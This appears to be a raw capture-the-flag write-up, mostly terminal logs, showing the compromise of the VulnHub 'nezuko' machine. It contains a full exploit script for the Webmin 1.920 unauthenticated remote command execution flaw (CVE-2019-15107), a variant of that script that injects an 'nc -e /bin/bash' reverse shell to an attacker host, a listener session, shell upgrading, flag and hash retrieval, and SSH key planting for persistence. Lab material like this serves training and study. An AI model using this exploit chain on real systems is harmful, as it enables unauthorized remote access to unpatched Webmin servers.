Please remember that VulnHub is a free community resource so we are unable to check the machines that are provided to us. Before you download, please read our FAQs sections dealing with the dangers of running unknown VMs and our suggestions for “protecting yourself and your network. If you understand the risks, please download!
Creator : @yunaranyancat (Twitter)
Difficulty : Easy ~ Intermediate
OS Used: Ubuntu 18.04
Services : Webmin 1.920, Apache, SSH
User : root, zenitsu, nezuko
Hashes : at their home directory
Currently scanning: 172.16.91.0/16 | Screen View: Unique Hosts
9 Captured ARP Req/Rep packets, from 5 hosts. Total size: 540
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.2.199 00:0c:29:18:22:fe 1 60 VMware, Inc.
192.168.219.1 f2:18:98:21:29:69 2 120 Unknown vendor
192.168.219.180 00:0c:29:18:22:fe 2 120 VMware, Inc.
192.168.219.254 00:50:56:fb:8b:50 2 120 VMware, Inc.
192.168.219.2 00:50:56:f1:66:62 2 120 VMware, Inc.
┌──(pinginglab㉿pinginglab)-[~]
└─$ sudo netdiscover -i eth0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 8646 bytes 1926100 (1.8 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 8646 bytes 1926100 (1.8 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
┌──(pinginglab㉿pinginglab)-[~]
└─$ nmap -A 192.168.219.0/24 -T 4
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-15 20:06 CST
Nmap scan report for 192.168.219.1 (192.168.219.1)
Host is up (0.0017s latency).
All 1000 scanned ports on 192.168.219.1 (192.168.219.1) are in ignored states.
Not shown: 1000 closed tcp ports (conn-refused)
Nmap scan report for 192.168.219.2 (192.168.219.2)
Host is up (0.0014s latency).
All 1000 scanned ports on 192.168.219.2 (192.168.219.2) are in ignored states.
Not shown: 1000 closed tcp ports (conn-refused)
Nmap scan report for 192.168.219.177 (192.168.219.177)
Host is up (0.0013s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.0p1 Debian 1 (protocol 2.0)
| ssh-hostkey:
| 256 8c:8c:6e:2c:b9:f6:97:3c:5b:fc:30:eb:c5:29:0e:38 (ECDSA)
|_ 256 ba:37:56:6d:cc:b1:a3:92:3a:09:c9:fb:9f:86:3e:39 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 192.168.219.180 (192.168.219.180)
Host is up (0.0019s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:f5:b3:ff:35:a8:c8:24:42:66:64:a4:4b:da:b0:16 (RSA)
| 256 2e:0d:6d:5b:dc:fe:25:cb:1b:a7:a0:93:20:3a:32:04 (ECDSA)
|_ 256 bc:28:8b:e4:9e:8d:4c:c6:42:ab:0b:64:ea:8f:60:41 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Welcome to my site! - nezuko kamado
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (4 hosts up) scanned in 9.58 seconds
┌──(pinginglab㉿pinginglab)-[~]
└─$
┌──(pinginglab㉿pinginglab)-[~]
└─$ nmap -p- -A 192.168.219.180
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-15 20:10 CST
Nmap scan report for 192.168.219.180 (192.168.219.180)
Host is up (0.00098s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:f5:b3:ff:35:a8:c8:24:42:66:64:a4:4b:da:b0:16 (RSA)
| 256 2e:0d:6d:5b:dc:fe:25:cb:1b:a7:a0:93:20:3a:32:04 (ECDSA)
|_ 256 bc:28:8b:e4:9e:8d:4c:c6:42:ab:0b:64:ea:8f:60:41 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Welcome to my site! - nezuko kamado
|_http-server-header: Apache/2.4.29 (Ubuntu)
13337/tcp open ssl/http MiniServ 1.920 (Webmin httpd)
|_http-title: Login to Webmin
| http-robots.txt: 1 disallowed entry
|_/
| ssl-cert: Subject: commonName=*/organizationName=Webmin Webserver on ubuntu
| Not valid before: 2019-08-20T09:28:46
|_Not valid after: 2024-08-18T09:28:46
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.21 seconds
┌──(pinginglab㉿pinginglab)-[~]
└─$
#!/bin/sh
#
# CVE-2019-15107 Webmin Unauhenticated Remote Command Execution
# based on Metasploit module https://www.exploit-db.com/exploits/47230
# Original advisory: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
# Alternative advisory (spanish): https://blog.nivel4.com/noticias/vulnerabilidad-de-ejecucion-de-comandos-remotos-en-webmin
#
# Fernando A. Lagos B. (Zerial)
# https://blog.zerial.org
# https://blog.nivel4.com
#
# The script sends a flag by a echo command then grep it. If match, target is vulnerable.
#
# Usage: sh CVE-2019-15107.sh https://target:port
# Example: sh CVE-2019-15107.sh https://localhost:10000
# output: Testing for RCE (CVE-2019-15107) on https://localhost:10000: VULNERABLE!
#
FLAG="f3a0c13c3765137bcde68572707ae5c0"
URI=$1;
echo -n "Testing for RCE (CVE-2019-15107) on $URI: ";
curl -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|echo '$FLAG'&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: '$URI'/session_login.cgi'|grep $FLAG>/dev/null 2>&1
if [ $? -eq 0 ];
then
echo '\033[0;31mVULNERABLE!\033[0m'
else
echo '\033[0;32mOK! (target is not vulnerable)\033[0m'
fi
#EOF
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ sh shell1.sh https://192.168.219.180:13337
test
https://192.168.219.180:13337
Testing for RCE (CVE-2019-15107) on https://192.168.219.180:13337: VULNERABLE!
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$
nc -e /bin/bash attack_ip port 作者:合天网安实验室 https://www.bilibili.com/read/cv3530863/ 出处:bilibili
nc -e /bin/bash 192.168.219.177 4444
echo -n "Testing for RCE (CVE-2019-15107) on $URI: ";
curl -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|nc -e /bin/bash 192.168.219.177 4444&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: '$URI'/session_login.cgi'|grep $FLAG>/dev/null 2>&1
┌──(pinginglab㉿pinginglab)-[~]
└─$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [192.168.219.177] from (UNKNOWN) [192.168.219.180] 51698
ls
Authen-SolarisRBAC-0.1
CHANGELOG
acl-lib.pl
id
uid=1000(nezuko) gid=1000(nezuko) groups=1000(nezuko),4(adm),24(cdrom),30(dip),46(plugdev),116(lpadmin),126(sambashare)
python -c 'import pty;pty.spawn("/bin/bash")'
id
uid=1000(nezuko) gid=1000(nezuko) groups=1000(nezuko),4(adm),24(cdrom),30(dip),46(plugdev),116(lpadmin),126(sambashare)
pwd
/usr/local/webmin/acl
ls -l
total 736
pwd
/home/nezuko
tail nezuko.txt
from_zenitsu
nezuko.txt
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
1af0941e0c4bd4564932184d47dd8bef
cat nezuko.txt
Congratulations! You have found nezuko! Now, try to surpass your limit! Right here, right now... ....
...
....
....
....
....
....
....
....
.,,,,,,,.. ....
. ...................................,,,,,,,,,.,,,,,,,,,,,.......,... ....
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,...,. ....
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,...,. ....................... ....
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, .,........,...,.................................... ....
,,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, ........... .........................,... ....
.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, ... . ........,......,... ....
.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, .. ... ...,,....,..,... ... ....
.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, .. .... ..... ..,,.....,... ... . ....
.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, . . ... .. . .... .......,... ... .
.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, . . . .. . ...,*,,,. ............
.,,,,,,,,,,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, .. */*/(/*,.. .... .. ..*/((/,. .................
..,,,,,,,,,,,,,,,,,,,,,,,,.,,,,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, .. .,*((((((((((((((/*,. .. .. ..*/((/.. .................
.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,, . . .,/(((((((((((((((((((((,... .. ..*/(/*..,(, ..............
.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, . .,*/((((((((((((((((((((((((, . ....,**..,((/, ...............
.,,,,,,,,,,,,..,,,,,,,,,,,,,..,,,,,,,,,,,,,,,.,,,,,,,,,,,,.,,,,,,.. . .*/((((((((((((((((((((((((((((/ ,/,,,./(((((, ...............
............................................................((*,.. . . *(((((((((((((((((((((((((((((((///,,,,(((((/..................
...............................................................,.. . ,(((((((((((//(((((((((((((((((((/,.,,,,*(/, ..................
......................................................... .....,.. .. . ,/(((((/*,,**/(((((((((((((((((* ...,..,....................
...............................................................,.. /((///((((((((((((((((((((((((/,/(#/ ....,..,....................
........................................................... .,.. .((((((((((/****/(((((((((((((((#(/(/ . ..,..,....................
...........................................................#/,,.. . . .,((((((((/**/((/,/(((((((((*,*((((((/ ....,..,....................
..............................................................,.. ... ,/((/**..*///*..*#(((((((((/(((((((#(* ....,..,....................
..............................................................,. . . ,/((/*/(((/(((#/*(((((((((/*..,**,(#/. ....,..,....................
.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,. .. . /((((,.,///##(((((((((//#(/(((,/. .,.,,..,....................
.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,,. */(((,**(/(#(((((((((#(((/.((#(* .,,..,..,.................... ............
.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,. . .,*((((//(((((###(#(((((((#((/*/((#*. .,,,,,..,.................... ............
.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,. . .. ,*,*/(((/*,*,/##(((##(##//#(((((###. ..,,,,,.,,.................... ............
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,. .. . ,....,*,,,*,,,.,,*(((((((*,,(#* ..,,,,,.,,.................... ..............
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,. .... ....//,*/******,*********,**,*,,,,,,,,*,.,,.,,.................... ..............
.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,. .... ... ..,*,,/****(//(((((*/*//*/*,,.,,.................... ..............
.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,. ... . ... ...**,,******,****************,******,**,,,,,.................... ............
..,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,. .. . ,, ....... ...............,,,,,,,,,,******,*,,,,,,.................... . ............
.,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,. .... ,*, .... ............................... ...,,,,,.................... ............
.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,. ... .,*,,,,,,*,,,,,,..,,,,,,,,. . ..........,,,,,,.................... ............
.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,. .. .***,**********,,*****,. . . ....,,,,,.................... ............
.......................................................,,,,*,.. . . ,****,*******,,*,. . .....,.,,.................... ............
...................................................... /*.,.. .. *****,*******,**, .... ..,. . ..,,,,.................... ............
.......................................................,..,.. .. ,*****,*******,*,. ...... ..,,. ... .,,,,.................... ............
..........................................................,.. ..... .*****,****,,,**......... ..,,,. ..... .,,,,.................... ............
..........................................................,.. ........ ,*****,****,,(#,......... ,,,,. ..... .,,,,.................... ............
.........................................................,.. ............ .,/********####*......... .,,,.........,,,,.................... ............
......................................................#/,,.. .............. ..(#(/**/*####(*,,....... .,.....,....,,,,.................... ............
........................................................*,. .............. ..,#####((####//*..... .. ... .,,,,.,,,,,,.................... ............
........................................................... ............... ...#####(####/*(,.... .. ...,,,,,,,,,,,,,.................... ............
.,,,,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.,,,,,,,. ............... ...(###(####(//(,.... ... ...,,,,,,,,,,,,,.................... ............
,.,,,,,.,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,. ................ ..,*(#(###%(*//(... ... ...,,,,,,,,,,,,,,.................... ............
..,,,,,.,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,. ................ ...,/*(#####*/((*... .... ...,,,,,,,,,,,,,,.................... ............
..,,,,,.,,,,,.,,,,,.,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,,. ................ ...,//####%*///(*.. ........,,,,,,,,,,,,,,,,.................... ............
.,,,,,,,,,,,.,,,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,. ....................//(//#%#*/(//... .........,,,,,,,,,,,,,,,,.................... ............
.,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,. ...................*/(///((//((/*.. .........,,,,,,,,,,,,,,,,,.................... ............
.,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,. ..................,*///******,,,.. ..........,,,,,,,,,,,,,,,,,.................... ............
.,,,,,,,,,.,,,.,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,. ................ .,,...,,,,,,,,... ........ .,,,,,,,,,,,,,,,,,.................... ............
..,,,,,,,,.,,..,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,. ..................,,,,,,,,,,,,, . ........ ..,,,,,,,,,,,,,,,,,.................... ............
,,,,,,,,.,,,.,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,. .......................... .......... ...,,,,,,,,,,,,,,,.,.................... ............
.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,. .................,****/*. .......... ....,,,,,,,,,,,,,,,.,.................... ............
.,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, ..................***,. .......... ....,,,,,,,,,,,,,,,.,.................... ............
........................,,,,,,,,,,,,,,,,,,,,,,,,,,.. ................... ......... ........,,,,,,,,,,,,.,.................... ............
............................................,*,,,. .............. ......... .........,,,,,,,,,,,.,.................... ............
...........................................,,.,,. ....... .. ..... ..........,,,,,,,,,,,.,.................... ............
.............................................,,. . ..........,,,,,,,,,,,,.,.................... ............
............................................,,. ....,,,.. . ..........,,,.,.,,,,,,.,.................... ............
...........................................,,. .,(*,. ......... ,,,,,.,,,,,,.,.................... ............
...................................... //,,,. ............. ....*/(//(/ .......... ,,.,.,,,,,,.,.................... ............
.......................................,,.,*. .....................,(/.,// .......... ...,.,,,,,,.,................... ............
.,,........................................,. ...................,**//, ..... .....,,,,,,.,................... .............
.,,,,..,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,,. ...................,/((/* .....,,,,,,.,................... .............
,,,..,,,,,,,,,.,,,,,.,,,.,,,,,,,,,,,,,,,,. ................ ,/(/(//(, ....... ......,,,,,,.,................... .............
..,..,,,,,,.,..,,,,,.,,,.,,,,,,,,,,,,,,,,. .......... ./(/(*,,. .....................,,,,,,.,.................. ............
...,,,,,,....,,,,,.,,,.,,,,,,,,,,,,,,,,. .... .,,,,,,, ................ ..,,,,,.,. ................
..,,.,,,..,,,,,,,.,,,.,,,,,,,,,,,,,,,,. ...,,, .............. ...,,,,.,.
.,,.,,,..,,,,,,,.,,,..,,,,,,,,,,,,,,,. .,,,. ... ......,,,,,.,.
...,,,,,,,,,,,,.,,,..,,,,,,,,,,,,,,,. ................ ........... .,,,,,.,.
.,.,,,,,,,,,,.,,,,,,.,..,,.,,,,,,,. ............... ......... .......,,,,.,.
..,,,,,,,,,,.,,,..,.,..,,,,,,,,,,. ...........,,,,.,.
.,,,,,,,,,.,,,,,,.,..,,,,,,,,,., ................ ........ ....................................................................
..,,,,,,,.,,,,,,.,,,,,,,,,,,,., ....................... ..,*/(/,....................................................................
.,,,,,,.,,,,,,,,,,,,,,,,,,,., .................,,,**/*.. .,*,*((/((/*...................................................................
........................... ...... ..*//(##/*. .. ...........................,.,...........................................................
....................... .,*/#(//*(/(/....,,,,.........,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.....,,..,,,,,,,,,,,...,,,........
.. ................ ..................,....,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,...
..........................................................................,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
..............................,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
..........................,,,..,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
..........................,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
1af0941e0c4bd4564932184d47dd8bef
cd from_zenitsu
ls
new_message_15-01-2023_17:05
new_message_15-01-2023_20:05
new_message_15-01-2023_20:10
new_message_15-01-2023_20:15
new_message_15-01-2023_20:20
new_message_15-01-2023_20:25
new_message_15-01-2023_20:30
new_message_15-01-2023_20:35
new_message_15-01-2023_20:40
new_message_15-01-2023_20:45
new_message_21-08-2019_01:13
new_message_21-08-2019_09:11
new_message_21-08-2019_09:12
new_message_21-08-2019_09:13
new_message_21-08-2019_09:40
cat new*
nezuko chan, would you like to go on a date with me?
nezuko chan, would you like to go on a date with me?
nezuko chan, would you like to go on a date with me?
nezuko chan, would you like to go on a date with me?
nezuko chan, would you like to go on a date with me?
nezuko chan, would you like to go on a date with me?
nezuko chan, would you like to go on a date with me?
nezuko chan, would you like to go on a date with me?
nezuko chan, would you like to go on a date with me?
nezuko chan, would you like to go on a date with me?
ls
nezuko
zenitsu
cd zenitus
cd zenitsu
ls
to_nezuko
zenitsu.txt
cat zenitsu.txt
Kaminari no kokyū, Ichi no kata...., Hekireki Issen!
............,,,,,,,,,,,,****************/***************,,,,,,,,,,,.........
.............,,,,,,,,*********((((((((((((((((((((((((((((((((((((///********,,,,,,,,.............
............,,,,,,,,,*********((((((((((((((((((((((((((((((((((((//*********,,,,,,,,............
............,,,,,,,,,**********(((((((((((((((((((((((((((((((//*********,,,,,,,,........... .
.............,,,,,,,,,*******,****///(((((((((((((((((((((((((((((//(##/**********,,,,,,,,.......... ...
..........,,,,,,,,,,,*****,*,*****///((/(((((((((((((((((((((///(/(######***********,,,,,,,,,....................
...............,,,,,,,,,,,,*********//####%%##*******,,,,,,,,,,,........................
..............,,,,,,,,,,,,,,***************///(@%#%(//#####@#******,,,,,,,,,,,,..........................
.............,,,,,,,,,,,,**,,,*********/(/(###%###///##########(/*********,,,,,,,,,,,,......................
.............,,,,,,,,,,,,,,,,,**********((((((%#%###%(%########//*********,,,,,,,,,,,.......................
...............,,,,,,,,,,,,,,,,**********//(#%%%%##(((#######(###%###(**********,,,,,,,,,,,........................
................,,,,,,,,,,,,,,,**********///#%&&&&&%%(##(##((####(((%####/**********,,,,,,,,,,,........................
...............,,,,,,,,,,,,,,,**********//#&%&&&&&&&&@@%/##((/(####%%#/(###(((*********,,,,,,,,,,,,,........................
..............,,,,,,,,,,,,,,,**********///%&&&%&&&&&&&&&&&%/##//(###((##(//(#(((**********,,,,,,,,,,,,,,.......................
...............,,,,,,,,,,,,,,**********/%&%%&%&&&@@&&&&&&&%//#%####(((#((//&@((**********,,,,,,,,,,,,,.........................
...............,,,,,,,,,,/((/*//#/****/%%%&&&%#(%&&&&&%&&*(##(((%((((#((/**********,,,,,,,,,,,,..........................
...............,,,,,,,,*%%#(((((**%%%%%%%%%%&%(%&&&&%%#(#((((((%&((//(*********,,,,,,,,,**/*................... ........
...............,,,,,*&&&&&%%(((((((%%%%%%%%%%%%%%#&%%%%((##((((((*//*********,*/(#%%&&&&&&%%#,...........................
................,,,*%%%#%&&((((/(/*#%%%(//(###(*#(#(*(((#((*,//******/(%&&&&&&&%%#(*,,,,,..................... ........
.............,,,##*/#%&&%%(((//(((,*,(%%%%%%%#//(%%///(//*,,*/#&&&&&&&%#(*,,,,,,,,,,,,,...................... ........
..............,,/#(%%&&&&%((/%%*(**,,*/%%%%%%%%//(###(/((&&&&&&%(*,,,,,,,,,,,,,,,,,,,,....................... .....
.............,(/#/*(%%%#((*%%%%%//,,,,,,,,*,,#,#(,#&&&%&/#%#*,........,,,,,,,,,,,,,,........................... ......
.............//##%%%%%((/*/%%#(//(//,,,,/%(%%##%%%%//,.......,,,,.....,,,,,,,,,.................. .......... ....
..............(#/##(#(//**/(/*/**//,,,(/#%(#%%%*%(#/,......,,,,,,,,,,........,..................... .......... ....
..............,#####/(/(//#/*,/(##(%#///*,,..........,,,,,,,,,,,,,.......,.................... .......... ...
..............*##((/,**..(*,//(,..............,,..,,,,,,,,,,,,,,,....................... .......... ..
.............,*...*/%(#/*....................,,,..,,,..,,,,,,,,,,,,,,,,.................. .....
...............*/((/........,,,,...,,,,,,..,,,..,,,,,,,,,,,......,,,............
...........,//((*.....,,,,,,...............,,.....,,...........,*(#...........
............///#///...............................,............,.,***#((,.........
...........,///*///*...........................................,..,****#(((///,......
...............,//*/#(//*,..........,/,*/..........................,...,/,..,#//#,.....
..................*/***..........,***((((,...............................,,,(*,,,//*//.... .
..............................(/,....................................**,/*,,#,.(..
........................,**///(/*...................................../....#*/.
..............................*/*.,,*,........................................,,*/......
........ .........................**(#(,./(.,,,,.................................(,,..,*........
.......... ........,.,,,,,,,,,,,,,,/*,**/*//*/*...................................,*,,,,*/..........
. .......... ........,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,....,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.............
, . ........ . .........,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,......,,,,,,,,,,,,,,,,,,,,,,,,,...............
,. ,.. ..... ..........,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,......,,,,,,,,,,,,,,,,,,,,,...............
, ..., ............,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,........,,,,,,,,,,,,...................
*, ..................,,.,.,..,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.............,....................
.........................,....,,.,,,,,.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,...............................
............................,..,....,,,.,,,,,.,,,,,,,,.,,..,,,,...,,,,...............................
3f2ada6791f96b6a50a9ee43ee6b62df
sshkey
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/home/pinginglab/.ssh/id_rsa): sshkey
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in sshkey
Your public key has been saved in sshkey.pub
The key fingerprint is:
SHA256:YyAJh37bhxAcyQPLL9V6SEPXlz2xgHrBlpJkLsD7i4o pinginglab@pinginglab
The key's randomart image is:
+---[RSA 3072]----+
| .+=++++ o.o.. |
| .o***o B o.o. |
| .o.Bo++ o .. |
| o+o*... |
| .o++.oS |
| .o.o... |
| . . . |
|. . . |
|E. |
+----[SHA256]-----+
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ ls
47230.rb 'shell1 copy.sh' shell1.sh sshkey sshkey.pub
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ cat sshkey.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDL6dNXCdbpYWynuXtPoTnuye9/isxXsiIBC1dqL/JWBulE7ebQSWOaIe1AW3P+m0zaWSttxIG3Yv+66vGiZ8vYkOz2IqiBhKPmhUA5MfAvjZ+13yGLFAnWymIGAz/XEE3fU/8K3WLB9J058WOG9pDFGDYhS0fwr+/g99tFI3dGyw0eWEdaX0l8FSuN1HSA53xM8cO6Manx4409cXuCbPy0xX6xFMOFfeZMmzCEUXLp3U/ofB8yzLVv+7gTRaxIgZ7EJgxGfBgFf3jLnZJW4G4YiNtMK7BSSau8C2Kt+5Sq0bmM9+GjsUFLQWHUHMmSo2tO/eYuJZnZVkKt1HOwnjjBLgqUWrbDzsuk8qEXzhFH8W7qIZqb3dEDLLnqDZ2QH3dBxVFAYCq6sTvoS5AB16WplDKLLV4JRdfps3rZOJ7GXlIkcfkyq+3L3FdTrY83FX4ZrSSat1/uUouYdHfVbOi9/xfXUn7UnjmdCQTxoOIZvdHnztGHbt4cazGwd/AwW2E= pinginglab@pinginglab
cat /home/nezuko/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDL6dNXCdbpYWynuXtPoTnuye9/isxXsiIBC1dqL/JWBulE7ebQSWOaIe1AW3P+m0zaWSttxIG3Yv+66vGiZ8vYkOz2IqiBhKPmhUA5MfAvjZ+13yGLFAnWymIGAz/XEE3fU/8K3WLB9J058WOG9pDFGDYhS0fwr+/g99tFI3dGyw0eWEdaX0l8FSuN1HSA53xM8cO6Manx4409cXuCbPy0xX6xFMOFfeZMmzCEUXLp3U/ofB8yzLVv+7gTRaxIgZ7EJgxGfBgFf3jLnZJW4G4YiNtMK7BSSau8C2Kt+5Sq0bmM9+GjsUFLQWHUHMmSo2tO/eYuJZnZVkKt1HOwnjjBLgqUWrbDzsuk8qEXzhFH8W7qIZqb3dEDLLnqDZ2QH3dBxVFAYCq6sTvoS5AB16WplDKLLV4JRdfps3rZOJ7GXlIkcfkyq+3L3FdTrY83FX4ZrSSat1/uUouYdHfVbOi9/xfXUn7UnjmdCQTxoOIZvdHnztGHbt4cazGwd/AwW2E= pinginglab@pinginglab
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ ssh -i sshkey nezuko@192.168.219.180
The authenticity of host '192.168.219.180 (192.168.219.180)' can't be established.
